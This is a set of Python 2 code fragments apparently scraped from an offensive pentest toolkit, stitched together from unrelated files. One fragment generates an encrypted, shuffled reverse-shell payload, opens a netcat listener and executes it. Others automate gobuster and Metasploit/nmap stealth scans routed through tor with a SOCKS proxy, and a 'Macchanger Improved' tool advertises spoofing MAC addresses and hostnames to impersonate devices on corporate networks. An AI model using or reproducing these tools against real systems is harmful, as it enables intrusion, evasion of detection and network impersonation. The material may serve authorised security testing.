Exemplo n.º 1
0
def main():

    print toolkits.cyan("""
    \n\n\n
    \t\tForeplay, EZ-Mode Armitage Teamserver Collaboration Menu
    \n\t\t\t\tCOMMANDS\n
    LAUNCH - Launch the Armitage Teamserver using NEW CREDENTIALS
    LOAD - Load PREVIOUSLY SAVED CREDENTIALS and launch a teamserver from that
    EXIT - Exit program
    """)

    opt_choice = str(raw_input(toolkits.yellow("Enter a COMMAND: ")))

    if opt_choice == "LAUNCH":
        collect_teamserver_creds(save_file)
        main()
    elif opt_choice == "LOAD":
        load_saved_teamserver_creds(save_file)
        main()
    elif opt_choice == "EXIT":
        print toolkits.red('Received exit command, exiting!')
        exit(0)
    else:
        print toolkits.red(
            'You have entered a invalid option, please try again')
        main()
    return
Exemplo n.º 2
0
def main():
    decryptKey = generateKey()
    decryptIV = generateIV()
    code = read_template()
    template_reverse_shell

    payloadNoEncrypt = template_reverse_shell.splitlines()
    shuffledPayload = commandSegmentationTech(payloadNoEncrypt)
    # writableLines = convertIntoLines(shuffledPayload)
    l_encrypted = cryptor(shuffledPayload, decryptKey, decryptIV)
    outfile = writeUniquePayload(code, l_encrypted, decryptKey, decryptIV)
    print red("DEBUG: Shuffled payload\r\n{}".format(str(shuffledPayload)))
    out = b64encode(l_encrypted)
    print yellow("DEBUG: Encrypted payload\r\n{}".format(str(out)))
    print green("DEBUG: Payload generated at\r\n{}".format(str(outfile)))
    rp = open(outfile, 'rb+')
    uniquePayload = rp.read()
    print red("DEBUG: Contents of {}\r\n".format(str(outfile)))
    print yellow(uniquePayload)
    print cyan("Opening netcat session")
    os.system("""gnome-terminal -e 'bash -c "nc -nvlp {}"'""".format(
        str(LPORT)))
    print green("You may run the payload with\r\npython {}".format(
        str(outfile)))
    time.sleep(2)
    print green("Executing payload")
    os.system("python {}".format(str(outfile)))
    return
Exemplo n.º 3
0
def main():
    print "MassGoBuster. Automatically run gobuster against a wordlist of host,port.\r\nComing soon: Threading by running 5 gobuster processes at a time."
    if len(sys.argv) < 2:
        print toolkits.yellow(
            "Usage:\r\npython massgobuster.py <wordlist of host,ports> <wordlist of paths> <OPTIONAL: threads, default=10>"
        )
        print toolkits.cyan(
            "\r\nEXAMPLE: python massGoBuster.py targetHostPort.txt /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 50\r\nEXAMPLE EFFECT: Runs GoBuster at a rate of 50 threads against each target,port combo found in the list of targets using the wordlist"
        )
        exit(0)
    else:
        inputFile = sys.argv[1]
        readInputFile(inputFile)
    return
def cyan(string):
    string = toolkits.cyan(string)

    print string
    return string
Exemplo n.º 5
0
def initial_scan(target_list):
    resource_file_default = '/tmp/resource_file_default.rc'
    print toolkits.cyan("Your selected target list file is {0}".format(
        str(target_list)))
    workspace = str(raw_input("Enter your Metasploit WORKSPACE: "))

    if workspace == "" or None:
        workspace = "default"
    else:
        pass
    # restarts tor

    TOR_restart_cmd = "service tor restart"
    os.system(TOR_restart_cmd)
    save_file_location = "/root/Documents"  # default nmap xml saved files location

    # asks user for a list of targets he wants to scan as a simple text file with one IP address or hostname per line

    # these are all of the enumeration scripts
    enum_scripts = """ajp-headers.nse,http-headers.nse,http-security-headers.nse,http-server-header.nse,cics-enum.nse,cics-user-enum.nse,citrix-enum-apps.nse,citrix-enum-apps-xml.nse,citrix-enum-servers.nse,citrix-enum-servers-xml.nse,dns-nsec3-enum.nse,dns-nsec-enum.nse,dns-srv-enum.nse,domino-enum-users.nse,eppc-enum-processes.nse,http-domino-enum-passwords.nse,http-drupal-enum.nse,http-drupal-enum-users.nse,http-enum.nse,http-gitweb-projects-enum.nse,http-svn-enum.nse,http-userdir-enum.nse,http-wordpress-enum.nse,krb5-enum-users.nse,msrpc-enum.nse,mysql-enum.nse,ncp-enum-users.nse,nrpe-enum.nse,omp2-enum-targets.nse,oracle-enum-users.nse,rdp-enum-encryption.nse,sip-enum-users.nse,smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-mbenum.nse,smtp-enum-users.nse,ssh2-enum-algos.nse,ssl-enum-ciphers.nse,tftp-enum.nse,tso-enum.nse,vtam-enum.nse"""

    # generates random time str to make the .xml file unique
    timestr = timestr = time.strftime("%Y%m%d-%H%M%S")

    # runs scans in this order, FIN, XMAS, and COMPREHENSIVE

    # the problem is that

    # we cannot multiplex additional commands into msf console with the -x option
    # the resource file option is slow as f**k.
    FIN_scan_cmd = """db_nmap -v -O -sF -Pn -T4 -O -F -oX {2}/FIN_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
        str(enum_scripts), str(target_list), str(save_file_location),
        str(timestr))

    #timestr = timestr = time.strftime("%Y%m%d-%H%M%S")

    XMAS_scan_cmd = """db_nmap -v -O -sX -Pn -T4 -O -F -oX {2}/XMAS_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
        str(enum_scripts), str(target_list), str(save_file_location),
        str(timestr))

    #timestr = timestr = time.strftime("%Y%m%d-%H%M%S")

    COMPRE_scan_cmd = """db_nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 -oX {2}/COMPRE_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
        str(enum_scripts), str(target_list), str(save_file_location),
        str(timestr))

    # runs all of these commands immediately after metasploit starts up.
    MSF_cmd = "workspace -a {0};setg WORKSPACE {0};{2};resource {1}".format(
        str(workspace), str(resource_file_default), str(FIN_scan_cmd))

    print toolkits.yellow("""
        DEBUG: db_nmap lines
        {0}

    """).format(str(MSF_cmd))

    time.sleep(3)
    db_nmap_resource_file = """
    use auxiliary/server/socks4a
    run -j
    {0}
    {1}
    {2}
    """.format(str(FIN_scan_cmd), str(XMAS_scan_cmd), str(COMPRE_scan_cmd))
    print toolkits.yellow("""
    DEBUG: Resource file content
    {0}
    """).format(str(db_nmap_resource_file))
    w = open(resource_file_default, 'w')
    w.write(db_nmap_resource_file)
    w.close()
    print toolkits.yellow("""
    DEBUG: Location of resource files

    {0}
    """).format(str(resource_file_default))

    debug_str = """ls -la {0}""".format(str(resource_file_default))
    bash_command(debug_str)

    host_cidr_range = ''
    darkoperator_resource_file = """
    workspace {0}
    load pentest
    network_discovery -d -v -r {1}
    """.format(str(workspace), str(host_cidr_range))

    MSF_cmd_exec(MSF_cmd)

    return MSF_cmd, resource_file_default
banner = """
    Macchanger Improved
    A needed makeover for a reknowned pentest tool

    'Automatically selects the CLOSEST non-conflicting MAC address by randomizing the last portion of the MAC'
    'Farms new real hostnames and MAC address ranges'
    'Swaps your hostname independently, allowing you to assume other identities or blend into corporate network routers and WDS systems, like UNLV-Secure, UNLV-Guest, or IGT-Gaming'

    Chang Tan
    Lister Unlimited Cybersecurity Solutions, LLC.
    [email protected]
    Macchanger Improved is Part of the Hyperjacker's Toolkit
    Open-Source Penetration Testing Toolkits are NOT AVAILABLE FOR RESALE.
"""

print cyan(banner)


def main():

    menu = """Exit
    Farm new MAC addresses to impersonate
    Wi-Fi Hostname Farmer, Farm new Hostnames (Computer ID's) to impersonate
    Activate Switch Identity + MAC address
    View impersonatable names
    View impersonatable MAC addresses
    LAN Hostname Farmer, Farm locally connected Hostnames using NetDiscover"""

    print """
        (run python install.py)
        INSTALL. Install both the Python and Debian/Kali APT Prerequisites